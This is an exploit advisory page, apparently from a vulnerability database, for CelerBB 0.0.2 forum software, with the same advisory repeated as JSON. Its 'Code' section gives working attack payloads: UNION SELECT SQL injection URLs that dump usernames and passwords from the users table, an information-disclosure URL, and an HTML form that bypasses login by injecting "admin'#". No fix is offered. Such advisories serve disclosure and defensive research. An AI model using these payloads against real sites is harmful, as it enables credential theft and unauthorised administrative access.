Search...

CelerBB 0.0.2 Multiple Remote Vulnerabilities

2009-03-06T00:00:00

ID SSV:10776
Type seebug
Reporter Root
Modified 2009-03-06T00:00:00

Description

No description provided by source.

                                        
                                            
                                                *******   Salvatore &quot;drosophila&quot; Fresta   *******

[+] Application: CelerBB
[+] Version: 0.0.2
[+] Website: http://celerbb.sourceforge.net/

[+] Bugs: [A] Multiple SQL Injection
          [B] Information Disclosure
          [C] Authenticaion Bypass

[+] Exploitation: Remote
[+] Date: 05 Mar 2009

[+] Discovered by: Salvatore &quot;drosophila&quot; Fresta
[+] Author: Salvatore &quot;drosophila&quot; Fresta
[+] Contact: e-mail: drosophilaxxx@gmail.com


*************************************************

[+] Menu

1) Bugs
2) Code
3) Fix


*************************************************

[+] Bugs


- [A] Multiple SQL Injection

[-] Requisites: magic_quotes_gpc = off
[-] File affected: viewforum.php, viewtopic.php

This bug allows a guest to view username and
password list.


- [B] Information Disclosure

[-] Requisites: none
[-] File affected: showme.php

This bug allows a guest to view reserved
information of any user.


- [C] Authentication Bypass

[-] Requisites: magic_quotes_gpc = off
[-] File affected: login.php

This bug allows a guest to bypass authentication.


*************************************************

[+] Code


- [A] Multiple SQL Injection

http://www.site.com/path/viewforum.php?id=-1' UNION ALL SELECT 1,2,GROUP_CONCAT(CONCAT(username, 0x3a, password)),4,5,6,7,8 FROM celer_users%23

http://www.site.com/path/viewtopic.php?id=1' UNION ALL SELECT 1,2,3,NULL,5,6,GROUP_CONCAT(CONCAT(username, 0x3a, password)),NULL FROM celer_users%23


- [B] Information Disclosure

http://www.site.com/path/showme.php?user=admin


- [C] Authentication Bypass

&lt;html&gt;
  &lt;head&gt;
    &lt;title&gt;CelerBB 0.0.2 Authentication Bypass Exploit&lt;/title&gt;
  &lt;/head&gt;
  &lt;body&gt;
    &lt;form action=&quot;login.php&quot; method=&quot;POST&quot;&gt;
      &lt;input type=&quot;hidden&quot; name=&quot;Username&quot; value=&quot;admin'#&quot;&gt;
      &lt;input type=&quot;submit&quot; value=&quot;Exploit&quot;&gt;
    &lt;/form&gt;
  &lt;/body&gt;
&lt;/html&gt;


*************************************************

[+] Fix

No fix.


*************************************************

JSON Vulners Source

Initial Source

{"href": "https://www.seebug.org/vuldb/ssvid-10776", "status": "poc", "bulletinFamily": "exploit", "modified": "2009-03-06T00:00:00", "title": "CelerBB 0.0.2 Multiple Remote Vulnerabilities", "cvss": {"vector": "NONE", "score": 0.0}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-10776", "cvelist": [], "description": "No description provided by source.", "viewCount": 2, "published": "2009-03-06T00:00:00", "sourceData": "\n ******* Salvatore "drosophila" Fresta *******\r\n\r\n[+] Application: CelerBB\r\n[+] Version: 0.0.2\r\n[+] Website: http://celerbb.sourceforge.net/\r\n\r\n[+] Bugs: [A] Multiple SQL Injection\r\n [B] Information Disclosure\r\n [C] Authenticaion Bypass\r\n\r\n[+] Exploitation: Remote\r\n[+] Date: 05 Mar 2009\r\n\r\n[+] Discovered by: Salvatore "drosophila" Fresta\r\n[+] Author: Salvatore "drosophila" Fresta\r\n[+] Contact: e-mail: drosophilaxxx@gmail.com\r\n\r\n\r\n*************************************************\r\n\r\n[+] Menu\r\n\r\n1) Bugs\r\n2) Code\r\n3) Fix\r\n\r\n\r\n*************************************************\r\n\r\n[+] Bugs\r\n\r\n\r\n- [A] Multiple SQL Injection\r\n\r\n[-] Requisites: magic_quotes_gpc = off\r\n[-] File affected: viewforum.php, viewtopic.php\r\n\r\nThis bug allows a guest to view username and\r\npassword list.\r\n\r\n\r\n- [B] Information Disclosure\r\n\r\n[-] Requisites: none\r\n[-] File affected: showme.php\r\n\r\nThis bug allows a guest to view reserved\r\ninformation of any user.\r\n\r\n\r\n- [C] Authentication Bypass\r\n\r\n[-] Requisites: magic_quotes_gpc = off\r\n[-] File affected: login.php\r\n\r\nThis bug allows a guest to bypass authentication.\r\n\r\n\r\n*************************************************\r\n\r\n[+] Code\r\n\r\n\r\n- [A] Multiple SQL Injection\r\n\r\nhttp://www.site.com/path/viewforum.php?id=-1' UNION ALL SELECT 1,2,GROUP_CONCAT(CONCAT(username, 0x3a, password)),4,5,6,7,8 FROM celer_users%23\r\n\r\nhttp://www.site.com/path/viewtopic.php?id=1' UNION ALL SELECT 1,2,3,NULL,5,6,GROUP_CONCAT(CONCAT(username, 0x3a, password)),NULL FROM celer_users%23\r\n\r\n\r\n- [B] Information Disclosure\r\n\r\nhttp://www.site.com/path/showme.php?user=admin\r\n\r\n\r\n- [C] Authentication Bypass\r\n\r\n<html>\r\n <head>\r\n <title>CelerBB 0.0.2 Authentication Bypass Exploit</title>\r\n </head>\r\n <body>\r\n <form action="login.php" method="POST">\r\n <input type="hidden" name="Username" value="admin'#">\r\n <input type="submit" value="Exploit">\r\n </form>\r\n </body>\r\n</html>\r\n\r\n\r\n*************************************************\r\n\r\n[+] Fix\r\n\r\nNo fix.\r\n\r\n\r\n*************************************************\n ", "id": "SSV:10776", "enchantments_done": [], "type": "seebug", "lastseen": "2017-11-19T18:56:53", "reporter": "Root", "enchantments": {"score": {"value": -0.1, "vector": "NONE", "modified": "2017-11-19T18:56:53", "rev": 2}, "dependencies": {"references": [], "modified": "2017-11-19T18:56:53", "rev": 2}, "vulnersScore": -0.1}, "references": []}